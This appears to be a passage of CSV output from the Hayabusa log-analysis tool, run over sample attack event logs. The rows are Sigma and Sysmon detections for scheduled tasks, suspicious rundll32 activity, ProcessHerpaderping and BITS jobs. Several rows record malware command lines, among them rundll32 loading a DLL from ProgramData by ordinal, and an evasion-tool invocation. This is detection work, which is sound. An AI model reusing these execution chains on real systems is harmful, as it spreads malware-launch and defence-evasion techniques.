Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Exec | Persis | 
PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:07.601 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 3420 | Src PGUID: 747F3D96-4790-5F93-0000-001054282200 | Tgt PID: 5864 | Tgt PGUID: 747F3D96-4694-5F93-0000-001092F70900,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8a619 | PID: 7552 | PGUID: 747F3D96-51F9-5F93-0000-001003125E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 9116 | PGUID: 
747F3D96-51F9-5F93-0000-0010551E5E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\Rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7552 | Src PGUID: 747F3D96-51F9-5F93-0000-001003125E00 | Tgt PID: 9116 | Tgt PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 7504 | PGUID: 747F3D96-51FD-5F93-0000-00103B425E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:21.696 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 9116 | Src PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00 | Tgt PID: 7504 | Tgt PGUID: 
747F3D96-51FD-5F93-0000-00103B425E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | LID: 0x8a619 | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:22.364 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\data.enc | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:22.391 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\config.xml | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-27 19:17:18.369 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\samir.exe | Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | PID: 21756 | PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-10-27 19:17:18.377 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | Tgt Process: samir.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 21756 | Src PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418 | Tgt PID: 21048 | Tgt PGUID: 00247C92-F3AE-5F97-0000-00104EBD0418,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: "".\samir.exe"" | Process: C:\Users\bouss\Downloads\samir.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe | LID: 0x1478dc6e | PID: 21048 | PGUID: 
00247C92-F3AE-5F97-0000-00104EBD0418",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: 
https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe | URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job 
Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 20:03:05.093 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,info,Evas | 
Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:36:30.267 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 21:51:23.040 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.752 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 